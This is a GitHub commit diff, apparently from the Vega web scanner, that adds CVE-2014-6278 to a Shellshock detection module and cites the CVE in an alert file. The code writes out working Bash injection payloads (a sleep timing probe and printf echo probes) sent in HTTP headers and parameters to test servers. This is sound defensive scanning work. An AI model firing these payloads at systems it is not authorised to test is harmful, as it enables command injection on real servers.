Skip to content

Commit

Permalink
fixes for CVE-2014-6271/6278
Browse files Browse the repository at this point in the history
  • Loading branch information
tdzmont committed Oct 6, 2014
1 parent 23dde89 commit 8bfbba9
Show file tree
Hide file tree
Showing 2 changed files with 134 additions and 76 deletions.
209 changes: 133 additions & 76 deletions scripts/scanner/modules/injection/bash-inject.js
Original file line number Diff line number Diff line change
@@ -1,112 +1,169 @@
var module = {
name: "Bash Environment Variable Blind OS Injection (CVE-2014-6271) Checks",
category: "Injection Modules",
differential: true
name: "Bash Environment Variable Blind OS Injection (CVE-2014-6271, CVE-2014-6278) Checks",
category: "Injection Modules",
differential: true
};

var alteredRequests = [];

var sleepPayload = "() { :;}; /bin/sleep 31"
var sleepPayload = "() { :;}; /bin/sleep 31";
var payload6271 = "() { :; }; printf 'Content-Type: text/json\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'";
var payload6278 = "() { _; } >_[\$(\$())] { printf 'Content-Type: text/html\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'; }";

alteredRequests.push({
payload: sleepPayload,
header: "Custom"
payload: payload6271,
header: "EchoAttackFirst",
check: "echo"
});
alteredRequests.push({
payload: payload6271,
header: "",
check: "echo"
});
alteredRequests.push({
payload: payload6271,
header: "Referer",
check: "echo"
});
alteredRequests.push({
payload: payload6271,
header: "Accept-Language",
check: "echo"
});
alteredRequests.push({
payload: payload6271,
header: "Cookie",
check: "echo"
});

alteredRequests.push({
payload: sleepPayload,
header: "User-Agent"
payload: payload6278,
header: "User-Agent",
check: "echo"
});
alteredRequests.push({
payload: payload6278,
header: "",
check: "echo"
});
alteredRequests.push({
payload: payload6278,
header: "Referer",
check: "echo"
});
alteredRequests.push({
payload: payload6278,
header: "Accept-Language",
check: "echo"
});
alteredRequests.push({
payload: payload6278,
header: "Cookie",
check: "echo"
});


alteredRequests.push({
payload: sleepPayload,
header: "Referer"
header: "",
check: "timeout"
});

alteredRequests.push({
payload: sleepPayload,
header: "Accept-Language"
header: "User-Agent",
check: "timeout"
});

alteredRequests.push({
payload: sleepPayload,
header: "Cookie"
header: "Referer",
check: "timeout"
});

alteredRequests.push({
payload: sleepPayload,
header: ""
payload: sleepPayload,
header: "Accept-Language",
check: "timeout"
});
alteredRequests.push({
payload: sleepPayload,
header: "Cookie",
check: "timeout"
});

function initialize(ctx) {
var ps = ctx.getPathState();
var req = ps.createAlteredRequest("", true);
req.addHeader("Custom", "() { :;}; /bin/sleep 31");
/*var req1 = ps.createAlteredRequest("", true);
req1.addHeader("User-Agent", "() { :;}; /bin/sleep 31 ");
var req2 = ps.createAlteredRequest("", true);
req2.addHeader("Referer", "() { :;}; /bin/sleep 31 ");
var req3 = ps.createAlteredRequest("", true);
req3.addHeader("Accept-Language", "() { :;}; /bin/sleep 31 ");
var req4 = ps.createAlteredRequest("", true);
req4.addHeader("Cookie", "() { :;}; /bin/sleep 31 ");
var req5 = ps.createAlteredRequest("() { :;}; /bin/sleep 31", false);
*/
ctx.submitRequest(req, process, 0);
/*ctx.submitRequest(req1, process, 1);
ctx.submitRequest(req2, process, 2);
ctx.submitRequest(req3, process, 3);
ctx.submitRequest(req4, process, 4);
ctx.submitRequest(req5, process, 5);*/
var ps = ctx.getPathState();
var req = ps.createAlteredRequest("", true);
req.addHeader("User-Agent","() { :; }; printf 'Content-Type: text/json\\r\\n\\r\\n%s vulnerable %s' 'VEGA123' 'VEGA123'");
ctx.submitRequest(req, process, 0);

}

var checkTiming = function(ctx, currentIndex) {
if (ctx.getSavedResponse(currentIndex).milliseconds > 30000) {
return true;
}
return false;
if (ctx.getSavedResponse(currentIndex).milliseconds > 30000) {
return true;
}
return false;
};


var checkOutput = function(ctx, currentIndex) {
if (ctx.getSavedResponse(currentIndex).bodyAsString.indexOf("VEGA123 avulnerable VEGA123") > -1) {
return true;
}
return false;
};

function process(req, res, ctx) {
if (ctx.hasModuleFailed()) return;
if (res.fetchFail) {
ctx.error(req, res, "During Bash Environment Variable injection checks");
ctx.setModuleFailed();
return;
}
var ps = ctx.getPathState();
var currentIndex = ctx.getCurrentIndex();
ctx.addRequestResponse(req, res);
ctx.incrementResponseCount();
var detected = checkTiming(ctx, currentIndex);
if (detected) {
var uri = String(req.requestLine.uri);
var uripart = uri.replace(/\?.*/, "");
if ((uripart.length > 2) && (uripart.slice(-1) == "/")) {
uripart = uripart.substring(0, uripart.length-1);
}
if (ctx.hasModuleFailed()) return;
if (res.fetchFail) {
ctx.error(req, res, "During Bash Environment Variable injection checks");
ctx.setModuleFailed();
return;
}
var ps = ctx.getPathState();

var currentIndex = ctx.getCurrentIndex();
ctx.addRequestResponse(req, res);
ctx.incrementResponseCount();

var type="";
if (alteredRequests[currentIndex].check == "echo"){
var detected = checkOutput(ctx, currentIndex); /* check for echod output first */
type = detected ? "Executed Commands on Host" : "";
}
else{
detected = checkTiming(ctx, currentIndex); /* check for timing attack */
type = detected ? "Blind Timing Analysis Checks" : "";
}
if (detected){
var uri = String(req.requestLine.uri);
var uripart = uri.replace(/\?.*/, "");
if ((uripart.length > 2) && (uripart.slice(-1) == "/")) {
uripart = uripart.substring(0, uripart.length-1);
}

ctx.alert("vinfo-bash-inject", ctx.getSavedRequest(currentIndex), ctx.getSavedResponse(currentIndex), {
output: res.bodyAsString,
key: "vinfo-shell-inject:" + uripart + ":" + ps.getFuzzableParameter().name,
resource: uripart,
detectiontype: 'Blind Timing Analysis Checks',
param: ps.getFuzzableParameter().name
});
} else {
if (currentIndex + 1 < alteredRequests.length) {
if (alteredRequests[currentIndex + 1].header == "") {
req = ps.createAlteredRequest(alteredRequests[currentIndex + 1].payload, false);
} else {
req = ps.createAlteredRequest("", true);
req.addHeader(alteredRequests[currentIndex + 1].header, alteredRequests[currentIndex + 1].payload);
}
ctx.submitAlteredRequest(process, req, currentIndex + 1);
ctx.alert("vinfo-bash-inject", ctx.getSavedRequest(currentIndex), ctx.getSavedResponse(currentIndex), {
output: res.bodyAsString,
key: "vinfo-shell-inject:" + uripart + ":" + ps.getFuzzableParameter().name,
resource: uripart,
detectiontype: type,
param: ps.getFuzzableParameter().name
});
} else {
if (currentIndex + 1 < alteredRequests.length) {
if (alteredRequests[currentIndex + 1].header == "") {
req = ps.createRequest();
req = ps.createAlteredRequest(alteredRequests[currentIndex + 1].payload, false);
} else {
req = ps.createRequest();
req.addHeader(alteredRequests[currentIndex + 1].header, alteredRequests[currentIndex + 1].payload);
}
ctx.submitRequest(req, process, currentIndex + 1);
var submitted=currentIndex+1;
}
}
if (ctx.allResponsesReceived()) {
}
if (ctx.allResponsesReceived()) {
ps.decrementFuzzCounter();
}
}

1 change: 1 addition & 0 deletions xml/alerts/vinfo-bash-inject.xml
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@
<references>
<url address="https://access.redhat.com/articles/1200223">Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271, CVE-2014-7169) (Red Hat)</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271">CVE-2014-6271</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278">CVE-2014-6278</url>
<url address="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169">CVE-2014-7169</url>
<url address="https://www.owasp.org/index.php/Command_Injection">Command Injection (OWASP)</url>
<url address="https://www.owasp.org/index.php/Reviewing_Code_for_OS_Injection">Reviewing Code for OS Injection (OWASP)</url>
Expand Down

0 comments on commit 8bfbba9

Please sign in to comment.